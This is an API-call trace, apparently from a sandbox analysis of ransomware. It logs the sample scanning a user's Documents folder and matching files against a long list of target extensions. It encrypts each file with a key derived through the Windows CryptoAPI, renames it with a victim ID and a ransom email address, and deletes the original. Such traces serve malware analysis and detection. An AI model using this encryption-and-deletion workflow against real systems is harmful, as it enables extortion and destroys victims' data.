	[0184.192] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpString2="-kAUovy5h.xlsx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\-kAUovy5h.xlsx") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\-kAUovy5h.xlsx"
	[0184.192] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\-kAUovy5h.xlsx") returned 46
	[0184.192] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0184.192] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\-kAUovy5h.xlsx", cchLength=0x2e | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\-kauovy5h.xlsx") returned 0x2e
	[0184.192] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.193] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\-kauovy5h.xlsx", lpSrch="help_decrypt_your_files") returned 0x0
	[0184.193] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\-kauovy5h.xlsx" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\-kauovy5h.xlsx") returned="c:\\users\\rdhj0cnfevzx\\documents\\-kauovy5h.xlsx"
	[0184.193] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\-kauovy5h.xlsx") returned 46
	[0184.193] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0184.193] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.194] StrStrW (lpFirst=".xlsx", lpSrch=".") returned=".xlsx"
	[0184.194] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.194] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xlsx") returned=".xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0184.194] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0184.194] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0184.194] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\-kauovy5h.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\-kauovy5h.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0184.198] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x7c05, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x7c05, lpOverlapped=0x0) returned 1
	[0184.200] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0184.200] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb880) returned 1
	[0184.209] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0184.209] CryptCreateHash (in: hProv=0xfcb880, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0184.209] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0184.209] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0184.209] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0184.210] CryptDeriveKey (in: hProv=0xfcb880, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9830) returned 1
	[0184.210] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0184.210] CryptEncrypt (in: hKey=0xfb9830, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x7c05, dwBufLen=0x7c05 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x7c10) returned 1
	[0184.211] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0184.211] RtlMoveMemory (in: Destination=0xfe4d90, Source=0xfdd180, Length=0x7c05 | out: Destination=0xfe4d90) 
	[0184.211] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0184.211] CryptEncrypt (in: hKey=0xfb9830, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe4d90*, pdwDataLen=0x18bc0c*=0x7c05, dwBufLen=0x7c10 | out: pbData=0xfe4d90*, pdwDataLen=0x18bc0c*=0x7c10) returned 1
	[0184.214] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0184.215] CryptDestroyKey (hKey=0xfb9830) returned 1
	[0184.215] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0184.215] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0184.215] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0184.215] CryptReleaseContext (hProv=0xfcb880, dwFlags=0x0) returned 1
	[0184.215] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0184.216] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0184.216] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0184.216] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0184.468] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\-kauovy5h.xlsx.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 88
	[0184.468] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\-kauovy5h.xlsx.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\-kauovy5h.xlsx.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0184.469] WriteFile (in: hFile=0x388, lpBuffer=0xfe4d90*, nNumberOfBytesToWrite=0x7c10, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfe4d90*, lpNumberOfBytesWritten=0x18c068*=0x7c10, lpOverlapped=0x0) returned 1
	[0184.473] CloseHandle (hObject=0x388) returned 1
	[0184.473] CloseHandle (hObject=0x384) returned 1
	[0184.474] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\-kauovy5h.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\-kauovy5h.xlsx")) returned 1
	[0184.485] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\-kauovy5h.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\-kauovy5h.xlsx")) returned 0
	[0184.485] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cd4d770, ftCreationTime.dwHighDateTime=0x1d9299f, ftLastAccessTime.dwLowDateTime=0x2e5d1ef0, ftLastAccessTime.dwHighDateTime=0x1d95ab7, ftLastWriteTime.dwLowDateTime=0x2e5d1ef0, ftLastWriteTime.dwHighDateTime=0x1d95ab7, nFileSizeHigh=0x0, nFileSizeLow=0x7a19, dwReserved0=0x0, dwReserved1=0x0, cFileName="0JwPQvrA-.xlsx", cAlternateFileName="0JWPQV~1.XLS")) returned 1
	[0184.485] lstrcmpW (lpString1="0JwPQvrA-.xlsx", lpString2="..") returned 1
	[0184.485] lstrcmpW (lpString1="0JwPQvrA-.xlsx", lpString2=".") returned 1
	[0184.485] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\"
	[0184.485] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpString2="0JwPQvrA-.xlsx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\0JwPQvrA-.xlsx") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\0JwPQvrA-.xlsx"
	[0184.485] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\0JwPQvrA-.xlsx") returned 46
	[0184.486] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0184.486] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\0JwPQvrA-.xlsx", cchLength=0x2e | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\0jwpqvra-.xlsx") returned 0x2e
	[0184.486] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.486] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\0jwpqvra-.xlsx", lpSrch="help_decrypt_your_files") returned 0x0
	[0184.486] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\0jwpqvra-.xlsx" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\0jwpqvra-.xlsx") returned="c:\\users\\rdhj0cnfevzx\\documents\\0jwpqvra-.xlsx"
	[0184.486] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\0jwpqvra-.xlsx") returned 46
	[0184.486] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0184.487] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.487] StrStrW (lpFirst=".xlsx", lpSrch=".") returned=".xlsx"
	[0184.487] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.487] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xlsx") returned=".xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0184.488] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0184.488] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0184.488] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\0jwpqvra-.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\0jwpqvra-.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0184.492] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x7a19, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x7a19, lpOverlapped=0x0) returned 1
	[0184.495] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
